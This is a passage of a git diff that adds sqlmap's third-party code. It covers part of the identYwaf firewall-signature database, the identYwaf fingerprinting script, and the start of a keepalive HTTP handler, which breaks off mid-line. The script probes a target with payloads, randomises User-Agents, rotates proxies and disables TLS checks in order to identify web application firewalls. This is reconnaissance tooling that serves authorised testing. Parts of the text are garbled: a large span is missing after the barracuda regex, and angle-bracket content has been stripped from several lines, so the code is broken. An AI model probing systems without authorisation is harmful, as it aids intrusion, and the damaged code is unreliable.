    Reference ID:", + "signatures": [] + }, + "aliyundun": { + "company": "Alibaba Cloud Computing", + "name": "AliYunDun", + "regex": "Sorry, your request has been blocked as it may cause potential threats to the server's security|//errors\\.aliyun\\.com/", + "signatures": [ + "e082:RVZXum61OElCWapAYKYPkoJzWOpohM4JiUYMr2RXg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC" + ] + }, + "anquanbao": { + "company": "Anquanbao", + "name": "Anquanbao", + "regex": "/aqb_cc/error/", + "signatures": [ + "c790:RVZXum61OElCWapAYKYPk4JzWOpohM4JiUYMr2RXg1uQJbX3uhdOn9hsOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c36A4chW1XaTC", + "d3d3:RVZXum61OElCWapAYKYPk4JzWOpohM4JiUYMr2RXg1uQJbX3uhdOn9hsOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c3qA4chW1XaTC" + ] + }, + "approach": { + "company": "Approach", + "name": "Approach", + "regex": "Approach.+?Web Application (Firewall|Filtering)", + "signatures": [ + "fef0:RVZXum60OEhCWKpAYKYPkoJyWOpohM4IiUYMrmRWg1qQJLX2uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59nui7c4RmkgI2FZjxtDtAeq+c36A5chW1XKTD" + ] + }, + "armor": { + "company": "Armor Defense", + "name": "Armor Protection", + "regex": "This request has been blocked by website protection from Armor", + "signatures": [ + "03ec:RVZXum60OEhCWapBYKYPk4JzWOtohM4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c36A4chS1XaTC", + "1160:RVZXum60OEhCWapBYKYPk4JyWOtohM4IiUcMr2RWg1qQJbX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC" + ], + "note": "Uses SecureSphere (Imperva) (Reference: https://www.imperva.com/resources/case_studies/CS_Armor.pdf)" + }, + "asm": { + "company": "F5 Networks", + "name": "Application Security Manager", + "regex": "The requested URL was rejected\\. Please consult with your administrator|security\\.f5aas\\.com", + "signatures": [ + "2f81:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI3FZjxtDtAeq+c36A4chS1XaTC", + "4fd0:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq6c3qA4chS1XaTC", + "5904:RVZXum60OEhCWapBYKcPk4JzWOpohc4IiUcMr2RWg1uQJbX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq+c3qA4chS1XaTC", + "8bcf:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq6c36A5chS1XaTC", + "540f:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq+c36A5chS1XaTC", + "c7ba:RVZXum60OEhCWKpAYKYPkoJzWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXomtLaK99n+i7c4VmkwI3FZjxtDtAeq6c3qA4chS1XaTC", + "fb21:RVZXum60OEhCWapBYKcPk4JzWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI3FZjxtDtAeq+c36A5chW1XaTC", + "b6ff:RVZXum61OEhCWapBYKcPkoJzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq+c36A4chW1XaTC", + "3b1e:RVZXum60OEhCWapBYKcPk4JyWOpohM4IiUcMr2RWg1qQJLX3uhdOnthtOj+hXrAB16FcPxJPdLsXo2tKaK99nui7c4RmkgI2FZjxtDtAeq6c3qA5chS1XKTC", + "620c:RVZXum60OEhCWapBYKcPkoJzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkgI2FZjxtDtAeq+c36A5chW1XaTC", + "b9a0:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq+c3qA4chW1XaTC", + "ccb6:RVdXum61OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtTtAeq+c36A5chW1XaTC", + "9138:RVZXum60OEhCWapBYKcPk4JzWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq6c3qA4chS1XaTC", + "54cc:RVZXum61OEhCWapBYKcPkoJzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq6c3qA4chS1XaTC", + "4c83:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4VmkwI3FZjxtDtAeq+c36A5chW1XaTC", + "8453:RVZXum60OEhCWapBYKcPk4JzWOtohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPxJPdLsXo2tLaK99n+i7c4RmkwI3FZjxtDtAeq+c36A4chS1XaTC" + ] + }, + "astra": { + "company": "Czar Securities", + "name": "Astra", + "regex": "(?s)unfortunately our website protection system.+?//www\\.getastra\\.com", + "signatures": [] + }, + "aws": { + "company": "Amazon", + "name": "AWS WAF", + "regex": "(?i)HTTP/1.+\\b403\\b.+\\s+Server: aws|(?s)Request blocked.+?Generated by cloudfront", + "signatures": [ + "2998:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhZOnthsOj6hXrAA16BcPhJOdLoXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC", + "fffa:RVZXum60OEhCWapAYKYPk4JyWOpohc4JiUcMr2RWg1uQJbX3uhdOnthtOj+hX7AB16FcPhJPdLsXo2tKaK99n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC", + "9de0:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhZOnthtOj+hXrAA16BcPhJOdLoXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC", + "34a8:RVZXu261OEhCWapBYKcPk4JzWOpohM4IiUcMr2RWg1uQJbX3uhdOn9htOj+hXrAB16BcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC", + "1104:RVZXum61OEhCWapBYKcPk4JzWOpohM4IiUcMr2RXg1uQJbX3uhZOnthsOj6hXrAA16BcPhJOdLoXomtKaK59n+i6c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC", + "ea40:RVZXu261OEhCWapBYKcPk4JzWOtohM4IiUcMr2RWg1uQJbX3uhdOn9htOj+hXrAB16BcPxJOdLsXo2tKaK99n+i7c4RmkgI2FZjxtDtAeq6c3qA4chS1XKTC" + ] + }, + "barracuda": { + "company": "Barracuda Networks", + "name": "Barracuda", + "regex": "\\bbarracuda_|barra_counter_session=|when this page occurred and the event ID found at the bottom of the page|||<[^>]+>|\s+", " ", retval[HTML]) + match = re.search(r"(?im)^Server: (.+)", retval[RAW]) + retval[SERVER] = match.group(1).strip() if match else "" + return retval + +def calc_hash(value, binary=True): + value = value.encode("utf8") if not isinstance(value, bytes) else value + result = zlib.crc32(value) & 0xffff + if binary: + result = struct.pack(">H", result) + return result + +def single_print(message): + if message not in seen: + print(message) + seen.add(message) + +def check_payload(payload, protection_regex=GENERIC_PROTECTION_REGEX % '|'.join(GENERIC_PROTECTION_KEYWORDS)): + global chained + global heuristic + global intrusive + global locked_code + global locked_regex + + time.sleep(options.delay or 0) + if options.post: + _ = "%s=%s" % ("".join(random.sample(string.ascii_letters, 3)), quote(payload)) + intrusive = retrieve(options.url, _) + else: + _ = "%s%s%s=%s" % (options.url, '?' if '?' not in options.url else '&', "".join(random.sample(string.ascii_letters, 3)), quote(payload)) + intrusive = retrieve(_) + + if options.lock and not payload.isdigit(): + if payload == HEURISTIC_PAYLOAD: + match = re.search(re.sub(r"Server:|Protected by", "".join(random.sample(string.ascii_letters, 6)), WAF_RECOGNITION_REGEX, flags=re.I), intrusive[RAW] or "") + if match: + result = True + + for _ in match.groupdict(): + if match.group(_): + waf = re.sub(r"\Awaf_", "", _) + locked_regex = DATA_JSON["wafs"][waf]["regex"] + locked_code = intrusive[HTTPCODE] + break + else: + result = False + + if not result: + exit(colorize("[x] can't lock results to a non-blind match")) + else: + result = re.search(locked_regex, intrusive[RAW]) is not None and locked_code == intrusive[HTTPCODE] + elif options.string: + result = options.string in (intrusive[RAW] or "") + elif options.code: + result = options.code == intrusive[HTTPCODE] + else: + result = intrusive[HTTPCODE] != original[HTTPCODE] or (intrusive[HTTPCODE] != 200 and intrusive[TITLE] != original[TITLE]) or (re.search(protection_regex, intrusive[HTML]) is not None and re.search(protection_regex, original[HTML]) is None) or (difflib.SequenceMatcher(a=original[HTML] or "", b=intrusive[HTML] or "").quick_ratio() < QUICK_RATIO_THRESHOLD) + + if not payload.isdigit(): + if result: + if options.debug: + print("\r---%s" % (40 * ' ')) + print(payload) + print(intrusive[HTTPCODE], intrusive[RAW]) + print("---") + + if intrusive[SERVER]: + servers.add(re.sub(r"\s*\(.+\)\Z", "", intrusive[SERVER])) + if len(servers) > 1: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTTP 'Server' headers detected (%s)" % ', '.join("'%s'" % _ for _ in sorted(servers)))) + + if intrusive[HTTPCODE]: + codes.add(intrusive[HTTPCODE]) + if len(codes) > 1: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTTP codes detected (%s)" % ', '.join("%s" % _ for _ in sorted(codes)))) + + if heuristic and heuristic[HTML] and intrusive[HTML] and difflib.SequenceMatcher(a=heuristic[HTML] or "", b=intrusive[HTML] or "").quick_ratio() < QUICK_RATIO_THRESHOLD: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTML responses detected")) + + if payload == HEURISTIC_PAYLOAD: + heuristic = intrusive + + return result + +def colorize(message): + if COLORIZE: + message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) + + if any(_ in message for _ in ("rejected summary", "challenge detected")): + for match in re.finditer(r"[^\w]'([^)]+)'" if "rejected summary" in message else r"\('(.+)'\)", message): + message = message.replace("'%s'" % match.group(1), "'\033[37m%s\033[00;49m'" % match.group(1), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): + message = message.replace("'%s'" % match.group(1), "'\033[37m%s\033[00;49m'" % match.group(1), 1) + + if "blind match" in message: + for match in re.finditer(r"\(((\d+)%)\)", message): + message = message.replace(match.group(1), "\033[%dm%s\033[00;49m" % (92 if int(match.group(2)) >= 95 else (93 if int(match.group(2)) > 80 else 90), match.group(1))) + + if "hardness" in message: + for match in re.finditer(r"\(((\d+)%)\)", message): + message = message.replace(match.group(1), "\033[%dm%s\033[00;49m" % (95 if " insane " in message else (91 if " hard " in message else (93 if " moderate " in message else 92)), match.group(1))) + + return message + +def parse_args(): + global options + + parser = optparse.OptionParser(version=VERSION) + parser.add_option("--delay", dest="delay", type=int, help="Delay (sec) between tests (default: 0)") + parser.add_option("--timeout", dest="timeout", type=int, help="Response timeout (sec) (default: 10)") + parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. \"http://127.0.0.1:8080\")") + parser.add_option("--proxy-file", dest="proxy_file", help="Load (rotating) HTTP(s) proxy list from a file") + parser.add_option("--random-agent", dest="random_agent", action="store_true", help="Use random HTTP User-Agent header value") + parser.add_option("--code", dest="code", type=int, help="Expected HTTP code in rejected responses") + parser.add_option("--string", dest="string", help="Expected string in rejected responses") + parser.add_option("--post", dest="post", action="store_true", help="Use POST body for sending payloads") + parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP) + parser.add_option("--fast", dest="fast", action="store_true", help=optparse.SUPPRESS_HELP) + parser.add_option("--lock", dest="lock", action="store_true", help=optparse.SUPPRESS_HELP) + + # Dirty hack(s) for help message + def _(self, *args): + retval = parser.formatter._format_option_strings(*args) + if len(retval) > MAX_HELP_OPTION_LENGTH: + retval = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retval + return retval + + parser.usage = "python %s " % parser.usage + parser.formatter._format_option_strings = parser.formatter.format_option_strings + parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser) + + for _ in ("-h", "--version"): + option = parser.get_option(_) + option.help = option.help.capitalize() + + try: + options, _ = parser.parse_args() + except SystemExit: + raise + + if len(sys.argv) > 1: + url = sys.argv[-1] + if not url.startswith("http"): + url = "http://%s" % url + options.url = url + else: + parser.print_help() + raise SystemExit + + for key in DEFAULTS: + if getattr(options, key, None) is None: + setattr(options, key, DEFAULTS[key]) + +def load_data(): + global WAF_RECOGNITION_REGEX + + if os.path.isfile(DATA_JSON_FILE): + with codecs.open(DATA_JSON_FILE, "rb", encoding="utf8") as f: + DATA_JSON.update(json.load(f)) + + WAF_RECOGNITION_REGEX = "" + for waf in DATA_JSON["wafs"]: + if DATA_JSON["wafs"][waf]["regex"]: + WAF_RECOGNITION_REGEX += "%s|" % ("(?P%s)" % (waf, DATA_JSON["wafs"][waf]["regex"])) + for signature in DATA_JSON["wafs"][waf]["signatures"]: + SIGNATURES[signature] = waf + WAF_RECOGNITION_REGEX = WAF_RECOGNITION_REGEX.strip('|') + + flags = "".join(set(_ for _ in "".join(re.findall(r"\(\?(\w+)\)", WAF_RECOGNITION_REGEX)))) + WAF_RECOGNITION_REGEX = "(?%s)%s" % (flags, re.sub(r"\(\?\w+\)", "", WAF_RECOGNITION_REGEX)) # patch for "DeprecationWarning: Flags not at the start of the expression" in Python3.7 + else: + exit(colorize("[x] file '%s' is missing" % DATA_JSON_FILE)) + +def init(): + os.chdir(os.path.abspath(os.path.dirname(__file__))) + + # Reference: http://blog.mathieu-leplatre.info/python-utf-8-print-fails-when-redirecting-stdout.html + if not PY3 and not IS_TTY: + sys.stdout = codecs.getwriter(locale.getpreferredencoding())(sys.stdout) + + print(colorize("[o] initializing handlers...")) + + # Reference: https://stackoverflow.com/a/28052583 + if hasattr(ssl, "_create_unverified_context"): + ssl._create_default_https_context = ssl._create_unverified_context + + if options.proxy_file: + if os.path.isfile(options.proxy_file): + print(colorize("[o] loading proxy list...")) + + with codecs.open(options.proxy_file, "rb", encoding="utf8") as f: + proxies.extend(re.sub(r"\s.*", "", _.strip()) for _ in f.read().strip().split('\n') if _.startswith("http")) + random.shuffle(proxies) + else: + exit(colorize("[x] file '%s' does not exist" % options.proxy_file)) + + + cookie_jar = CookieJar() + opener = build_opener(HTTPCookieProcessor(cookie_jar)) + install_opener(opener) + + if options.proxy: + opener = build_opener(ProxyHandler({"http": options.proxy, "https": options.proxy})) + install_opener(opener) + + if options.random_agent: + revision = random.randint(20, 64) + platform = random.sample(("X11; %s %s" % (random.sample(("Linux", "Ubuntu; Linux", "U; Linux", "U; OpenBSD", "U; FreeBSD"), 1)[0], random.sample(("amd64", "i586", "i686", "amd64"), 1)[0]), "Windows NT %s%s" % (random.sample(("5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"), 1)[0], random.sample(("", "; Win64", "; WOW64"), 1)[0]), "Macintosh; Intel Mac OS X 10.%s" % random.randint(1, 11)), 1)[0] + user_agent = "Mozilla/5.0 (%s; rv:%d.0) Gecko/20100101 Firefox/%d.0" % (platform, revision, revision) + HEADERS["User-Agent"] = user_agent + +def format_name(waf): + return "%s%s" % (DATA_JSON["wafs"][waf]["name"], (" (%s)" % DATA_JSON["wafs"][waf]["company"]) if DATA_JSON["wafs"][waf]["name"] != DATA_JSON["wafs"][waf]["company"] else "") + +def non_blind_check(raw, silent=False): + retval = False + match = re.search(WAF_RECOGNITION_REGEX, raw or "") + if match: + retval = True + for _ in match.groupdict(): + if match.group(_): + waf = re.sub(r"\Awaf_", "", _) + non_blind.add(waf) + if not silent: + single_print(colorize("[+] non-blind match: '%s'%s" % (format_name(waf), 20 * ' '))) + return retval + +def run(): + global original + + hostname = options.url.split("//")[-1].split('/')[0].split(':')[0] + + if not hostname.replace('.', "").isdigit(): + print(colorize("[i] checking hostname '%s'..." % hostname)) + try: + socket.getaddrinfo(hostname, None) + except socket.gaierror: + exit(colorize("[x] host '%s' does not exist" % hostname)) + + results = "" + signature = b"" + counter = 0 + original = retrieve(options.url) + + if 300 <= (original[HTTPCODE] or 0) < 400 and original[URL]: + original = retrieve(original[URL]) + + options.url = original[URL] + + if original[HTTPCODE] is None: + exit(colorize("[x] missing valid response")) + + if not any((options.string, options.code)) and original[HTTPCODE] >= 400: + non_blind_check(original[RAW]) + if options.debug: + print("\r---%s" % (40 * ' ')) + print(original[HTTPCODE], original[RAW]) + print("---") + exit(colorize("[x] access to host '%s' seems to be restricted%s" % (hostname, (" (%d: '%s')" % (original[HTTPCODE], original[TITLE].strip())) if original[TITLE] else ""))) + + challenge = None + if all(_ in original[HTML].lower() for _ in ("eval", "]*>(.*)", re.sub(r"(?is)", "", original[HTML])) + if re.search(r"(?i)<(body|div)", original[HTML]) is None or (match and len(match.group(1)) == 0): + challenge = re.search(r"(?is)", original[HTML]).group(0).replace("\n", "\\n") + print(colorize("[x] anti-robot JS challenge detected ('%s%s')" % (challenge[:MAX_JS_CHALLENGE_SNAPLEN], "..." if len(challenge) > MAX_JS_CHALLENGE_SNAPLEN else ""))) + + protection_keywords = GENERIC_PROTECTION_KEYWORDS + protection_regex = GENERIC_PROTECTION_REGEX % '|'.join(keyword for keyword in protection_keywords if keyword not in original[HTML].lower()) + + print(colorize("[i] running basic heuristic test...")) + if not check_payload(HEURISTIC_PAYLOAD): + check = False + if options.url.startswith("https://"): + options.url = options.url.replace("https://", "http://") + check = check_payload(HEURISTIC_PAYLOAD) + if not check: + if non_blind_check(intrusive[RAW]): + exit(colorize("[x] unable to continue due to static responses%s" % (" (captcha)" if re.search(r"(?i)captcha", intrusive[RAW]) is not None else ""))) + elif challenge is None: + exit(colorize("[x] host '%s' does not seem to be protected" % hostname)) + else: + exit(colorize("[x] response not changing without JS challenge solved")) + + if options.fast and not non_blind: + exit(colorize("[x] fast exit because of missing non-blind match")) + + if not intrusive[HTTPCODE]: + print(colorize("[i] rejected summary: RST|DROP")) + else: + _ = "...".join(match.group(0) for match in re.finditer(GENERIC_ERROR_MESSAGE_REGEX, intrusive[HTML])).strip().replace(" ", " ") + print(colorize(("[i] rejected summary: %d ('%s%s')" % (intrusive[HTTPCODE], ("%s" % intrusive[TITLE]) if intrusive[TITLE] else "", "" if not _ or intrusive[HTTPCODE] < 400 else ("...%s" % _))).replace(" ('')", ""))) + + found = non_blind_check(intrusive[RAW] if intrusive[HTTPCODE] is not None else original[RAW]) + + if not found: + print(colorize("[-] non-blind match: -")) + + for item in DATA_JSON["payloads"]: + info, payload = item.split("::", 1) + counter += 1 + + if IS_TTY: + sys.stdout.write(colorize("\r[i] running payload tests... (%d/%d)\r" % (counter, len(DATA_JSON["payloads"])))) + sys.stdout.flush() + + if counter % VERIFY_OK_INTERVAL == 0: + for i in xrange(VERIFY_RETRY_TIMES): + if not check_payload(str(random.randint(1, 9)), protection_regex): + break + elif i == VERIFY_RETRY_TIMES - 1: + exit(colorize("[x] host '%s' seems to be misconfigured or rejecting benign requests%s" % (hostname, (" (%d: '%s')" % (intrusive[HTTPCODE], intrusive[TITLE].strip())) if intrusive[TITLE] else ""))) + else: + time.sleep(5) + + last = check_payload(payload, protection_regex) + non_blind_check(intrusive[RAW]) + signature += struct.pack(">H", ((calc_hash(payload, binary=False) << 1) | last) & 0xffff) + results += 'x' if last else '.' + + if last and info not in blocked: + blocked.append(info) + + _ = calc_hash(signature) + signature = "%s:%s" % (_.encode("hex") if not hasattr(_, "hex") else _.hex(), base64.b64encode(signature).decode("ascii")) + + print(colorize("%s[=] results: '%s'" % ("\n" if IS_TTY else "", results))) + + hardness = 100 * results.count('x') // len(results) + print(colorize("[=] hardness: %s (%d%%)" % ("insane" if hardness >= 80 else ("hard" if hardness >= 50 else ("moderate" if hardness >= 30 else "easy")), hardness))) + + if blocked: + print(colorize("[=] blocked categories: %s" % ", ".join(blocked))) + + if not results.strip('.') or not results.strip('x'): + print(colorize("[-] blind match: -")) + + if re.search(r"(?i)captcha", original[HTML]) is not None: + exit(colorize("[x] there seems to be an activated captcha")) + else: + print(colorize("[=] signature: '%s'" % signature)) + + if signature in SIGNATURES: + waf = SIGNATURES[signature] + print(colorize("[+] blind match: '%s' (100%%)" % format_name(waf))) + elif results.count('x') < MIN_MATCH_PARTIAL: + print(colorize("[-] blind match: -")) + else: + matches = {} + markers = set() + decoded = base64.b64decode(signature.split(':')[-1]) + for i in xrange(0, len(decoded), 2): + part = struct.unpack(">H", decoded[i: i + 2])[0] + markers.add(part) + + for candidate in SIGNATURES: + counter_y, counter_n = 0, 0 + decoded = base64.b64decode(candidate.split(':')[-1]) + for i in xrange(0, len(decoded), 2): + part = struct.unpack(">H", decoded[i: i + 2])[0] + if part in markers: + counter_y += 1 + elif any(_ in markers for _ in (part & ~1, part | 1)): + counter_n += 1 + result = int(round(100.0 * counter_y / (counter_y + counter_n))) + if SIGNATURES[candidate] in matches: + if result > matches[SIGNATURES[candidate]]: + matches[SIGNATURES[candidate]] = result + else: + matches[SIGNATURES[candidate]] = result + + if chained: + for _ in list(matches.keys()): + if matches[_] < 90: + del matches[_] + + if not matches: + print(colorize("[-] blind match: - ")) + print(colorize("[!] probably chained web protection systems")) + else: + matches = [(_[1], _[0]) for _ in matches.items()] + matches.sort(reverse=True) + + print(colorize("[+] blind match: %s" % ", ".join("'%s' (%d%%)" % (format_name(matches[i][1]), matches[i][0]) for i in xrange(min(len(matches), MAX_MATCHES) if matches[0][0] != 100 else 1)))) + + print() + +def main(): + if "--version" not in sys.argv: + print(BANNER) + + parse_args() + init() + run() + +load_data() + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + exit(colorize("\r[x] Ctrl-C pressed")) diff --git a/src/sqlmap-master/thirdparty/keepalive/__init__.py b/src/sqlmap-master/thirdparty/keepalive/__init__.py new file mode 100644 index 0000000..08a0be4 --- /dev/null +++ b/src/sqlmap-master/thirdparty/keepalive/__init__.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python +# +# Copyright 2002-2003 Michael D. Stenner +# +# This program is free software: you can redistribute it and/or modify it +# under the terms of the GNU Lesser General Public License as published +# by the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . +# + +pass diff --git a/src/sqlmap-master/thirdparty/keepalive/keepalive.py b/src/sqlmap-master/thirdparty/keepalive/keepalive.py new file mode 100644 index 0000000..2dda424 --- /dev/null +++ b/src/sqlmap-master/thirdparty/keepalive/keepalive.py @@ -0,0 +1,649 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. +# +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. +# +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the +# Free Software Foundation, Inc., +# 59 Temple Place, Suite 330, +# Boston, MA 02111-1307 USA + +# This file was part of urlgrabber, a high-level cross-protocol url-grabber +# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko +# Copyright 2015 Sergio Fernández + +"""An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive. + +>>> import urllib2 +>>> from keepalive import HTTPHandler +>>> keepalive_handler = HTTPHandler() +>>> opener = _urllib.request.build_opener(keepalive_handler) +>>> _urllib.request.install_opener(opener) +>>> +>>> fo = _urllib.request.urlopen('http://www.python.org') + +If a connection to a given host is requested, and all of the existing +connections are still in use, another connection will be opened. If +the handler tries to use an existing connection but it fails in some +way, it will be closed and removed from the pool. + +To remove the handler, simply re-run build_opener with no arguments, and +install that opener. + +You can explicitly close connections by using the close_connection() +method of the returned file-like object (described below) or you can +use the handler methods: + + close_connection(host) + close_all() + open_connections() + +NOTE: using the close_connection and close_all methods of the handler +should be done with care when using multiple threads. + * there is nothing that prevents another thread from creating new + connections immediately after connections are closed + * no checks are done to prevent in-use connections from being closed + +>>> keepalive_handler.close_all() + +EXTRA ATTRIBUTES AND METHODS + + Upon a status of 200, the object returned has a few additional + attributes and methods, which should not be used if you want to + remain consistent with the normal urllib2-returned objects: + + close_connection() - close the connection to the host + readlines() - you know, readlines() + status - the return status (ie 404) + reason - english translation of status (ie 'File not found') + + If you want the best of both worlds, use this inside an + AttributeError-catching try: + + >>> try: status = fo.status + >>> except AttributeError: status = None + + Unfortunately, these are ONLY there if status == 200, so it's not + easy to distinguish between non-200 responses. The reason is that + urllib2 tries to do clever things with error codes 301, 302, 401, + and 407, and it wraps the object upon return. + + For python versions earlier than 2.4, you can avoid this fancy error + handling by setting the module-level global HANDLE_ERRORS to zero. + You see, prior to 2.4, it's the HTTP Handler's job to determine what + to handle specially, and what to just pass up. HANDLE_ERRORS == 0 + means "pass everything up". In python 2.4, however, this job no + longer belongs to the HTTP Handler and is now done by a NEW handler, + HTTPErrorProcessor. Here's the bottom line: + + python version < 2.4 + HANDLE_ERRORS == 1 (default) pass up 200, treat the rest as + errors + HANDLE_ERRORS == 0 pass everything up, error processing is + left to the calling code + python version >= 2.4 + HANDLE_ERRORS == 1 pass up 200, treat the rest as errors + HANDLE_ERRORS == 0 (default) pass everything up, let the + other handlers (specifically, + HTTPErrorProcessor) decide what to do + + In practice, setting the variable either way makes little difference + in python 2.4, so for the most consistent behavior across versions, + you probably just want to use the defaults, which will give you + exceptions on errors. + +""" + +from __future__ import print_function + +try: + from thirdparty.six.moves import http_client as _http_client + from thirdparty.six.moves import range as _range + from thirdparty.six.moves import urllib as _urllib +except ImportError: + from six.moves import http_client as _http_client + from six.moves import range as _range + from six.moves import urllib as _urllib + +import socket +import threading + +DEBUG = None + +import sys +if sys.version_info < (2, 4): HANDLE_ERRORS = 1 +else: HANDLE_ERRORS = 0 + +class ConnectionManager: + """ + The connection manager must be able to: + * keep track of all existing + """ + def __init__(self): + self._lock = threading.Lock() + self._hostmap = {} # map hosts to a list of connections + self._connmap = {} # map connections to host + self._readymap = {} # map connection to ready state + + def add(self, host, connection, ready): + self._lock.acquire() + try: + if host not in self._hostmap: self._hostmap[host] = [] + self._hostmap[host].append(connection) + self._connmap[connection] = host + self._readymap[connection] = ready + finally: + self._lock.release() + + def remove(self, connection): + self._lock.acquire() + try: + try: + host = self._connmap[connection] + except KeyError: + pass + else: + del self._connmap[connection] + del self._readymap[connection] + self._hostmap[host].remove(connection) + if not self._hostmap[host]: del self._hostmap[host] + finally: + self._lock.release() + + def set_ready(self, connection, ready): + try: self._readymap[connection] = ready + except KeyError: pass + + def get_ready_conn(self, host): + conn = None + try: + self._lock.acquire() + if host in self._hostmap: + for c in self._hostmap[host]: + if self._readymap.get(c): + self._readymap[c] = 0 + conn = c + break + finally: + self._lock.release() + return conn + + def get_all(self, host=None): + if host: + return list(self._hostmap.get(host, [])) + else: + return dict(self._hostmap) + +class KeepAliveHandler: + def __init__(self): + self._cm = ConnectionManager() + + #### Connection Management + def open_connections(self): + """return a list of connected hosts and the number of connections + to each. [('foo.com:80', 2), ('bar.org', 1)]""" + return [(host, len(li)) for (host, li) in self._cm.get_all().items()] + + def close_connection(self, host): + """close connection(s) to + host is the host:port spec, as in 'www.cnn.com:8080' as passed in. + no error occurs if there is no connection to that host.""" + for h in self._cm.get_all(host): + self._cm.remove(h) + h.close() + + def close_all(self): + """close all open connections""" + for host, conns in self._cm.get_all().items(): + for h in conns: + self._cm.remove(h) + h.close() + + def _request_closed(self, request, host, connection): + """tells us that this request is now closed and the the + connection is ready for another request""" + self._cm.set_ready(connection, 1) + + def _remove_connection(self, host, connection, close=0): + if close: connection.close() + self._cm.remove(connection) + + #### Transaction Execution + def do_open(self, req): + host = req.host + if not host: + raise _urllib.error.URLError('no host given') + + try: + h = self._cm.get_ready_conn(host) + while h: + r = self._reuse_connection(h, req, host) + + # if this response is non-None, then it worked and we're + # done. Break out, skipping the else block. + if r: break + + # connection is bad - possibly closed by server + # discard it and ask for the next free connection + h.close() + self._cm.remove(h) + h = self._cm.get_ready_conn(host) + else: + # no (working) free connections were found. Create a new one. + h = self._get_connection(host) + if DEBUG: DEBUG.info("creating new 